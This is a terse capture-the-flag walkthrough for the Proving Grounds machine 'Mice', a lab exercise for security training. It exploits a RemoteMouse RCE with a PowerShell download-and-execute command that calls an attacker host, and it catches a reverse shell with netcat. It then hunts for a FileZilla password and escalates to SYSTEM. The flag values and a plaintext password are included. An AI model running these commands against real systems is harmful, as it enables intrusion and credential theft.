Platform: OffSec Proving Grounds
IP Address: 192.168.228.199
Difficulty: Easy
This PG machine exposes RemoteMouse and other uncommon ports. RemoteMouse 3.008 is known to be vulnerable to RCE. We leverage that to gain an initial foothold via a PowerShell reverse shell, then discover FileZilla credentials and escalate to Administrator via a known LPE vulnerability. Screenshots prove both user and root access.
nmap -p- --min-rate 10000 192.168.228.199
PORT STATE SERVICE
1978/tcp open remotemouse
1979/tcp open unisql-java
1980/tcp open pearldoc-xact
3389/tcp open ms-wbt-server
7680/tcp open pando-pub
nmap -p 1978,1979,1980,3380,7680 -sCV -oN nmapscan 192.168.228.199
1978 identified as RemoteMouse# PowerShell revshell saved as own.ps1
sudo python3 -m http.server 80
./RemoteMouse-3.008-Exploit.py --target-ip 192.168.228.199 \
--cmd "powershell -c \"iex (New-Object Net.WebClient).DownloadString('http://192.168.45.206:80/own.ps1')\""
nc -lvnp 443
whoami → remote-pc\divine
hostname → Remote-PC
type Desktop\local.txt → `7b179f432c64ed054f461afac5c5bdb0`
—
findstr /S /I /C:"pass" *.ini *.cfg *.config *.xml
C:\Users\divine\AppData\Roaming\FileZilla\recentservers.xml

ControlFreak11xfreerdp3 /v:192.168.228.199 /u:"divine" /p:"ControlFreak11" /f
whoami → nt authority\system
type Desktop\proof.txt → `5124eb2ab003150adea6c56b12755753`

“Writeup and proof included in GitHub repo: https://github.com/inkedqt/ctf-writeups/tree/main/Other/PG/Mice”